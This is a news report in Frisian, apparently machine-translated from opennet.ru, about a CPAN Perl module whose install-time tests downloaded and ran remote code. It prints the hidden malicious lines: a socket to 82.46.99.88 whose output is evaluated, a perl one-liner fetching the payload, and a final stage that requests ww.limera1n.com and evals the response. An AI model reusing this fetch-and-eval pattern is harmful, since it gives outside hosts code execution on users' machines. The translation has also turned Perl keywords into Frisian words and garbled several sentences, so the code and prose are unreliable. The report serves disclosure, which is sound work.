Yn in Perl-pakket ferspraat fia de CPAN-map , ûntworpen om automatysk CPAN-modules op 'e flecht te laden, kweade koade. De kweade ynfoegje wie yn de test koade , dy't sûnt 2011 ferstjoerd wurdt.
It is opmerklik dat fragen oer it laden fan twifele koade ûntstienen werom yn 2016.
Kweaze aktiviteit komt del op in besykjen om koade te downloaden en út te fieren fan in tsjinner fan tredden (http://r.cx:1/) by it útfieren fan in testsuite lansearre by it ynstallearjen fan de module. Der wurdt oannommen dat de koade dy't ynearsten ynladen fan de eksterne tsjinner wie net kwea-aardich, mar no wurdt it fersyk omlaat nei it ww.limera1n.com domein, dat jout syn diel fan de koade foar útfiering.
Om de download yn in bestân te organisearjen De folgjende koade wurdt brûkt:
myn $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
myn $try = `$^X $prog`;
De oantsjutte koade soarget foar it útfieren fan it skript , wêrfan de ynhâld wurdt fermindere ta de rigel:
brûk lib do{eval<$b>&&botstrap("RCX")if$b=nije IO::Socket::INET 82.46.99.88.":1″};
Dit skript wurdt laden mei help fan de tsjinst koade fan de eksterne host r.cx (karakter koades 82.46.99.88 oerien mei de tekst "R.cX") en fiert it út yn de eval blok.
$ perl -MIO::Socket -e'$b=nije IO::Socket::INET 82.46.99.88.":1″; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
Nei it útpakke wurdt úteinlik it folgjende útfierd: :
print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1
It problematyske pakket is no fuorthelle út de repository. (Perl Authors Upload Server), en it akkount fan de auteur fan de module is blokkearre. Yn dit gefal bliuwt de module noch yn it MetaCPAN-argyf en kin direkt ynstalleare wurde fan MetaCPAN mei guon nutsbedriuwen lykas cpanminus. dat it pakket net wiid ferspraat wie.
Nijsgjirrich om te besprekken en de skriuwer fan 'e module, dy't wegere de ynformaasje dy't kweade koade waard ynfoege neidat syn side "r.cx" waard hacked en ferklearre dat hy wie gewoan wille, en brûkte perlobfuscator.com net te ferbergjen wat, mar te ferminderjen de grutte fan de koade en it ferienfâldigjen fan it kopiearjen fia it klamboerd. De kar foar de funksjenamme "botstrap" wurdt ferklearre troch it feit dat dit wurd "klinkt as bot en koarter is dan bootstrap." De skriuwer fan 'e module fersekere ek dat de identifisearre manipulaasjes gjin kweade aksjes útfiere, mar allinich it laden en útfieren fan koade fia TCP demonstrearje.
Boarne: opennet.ru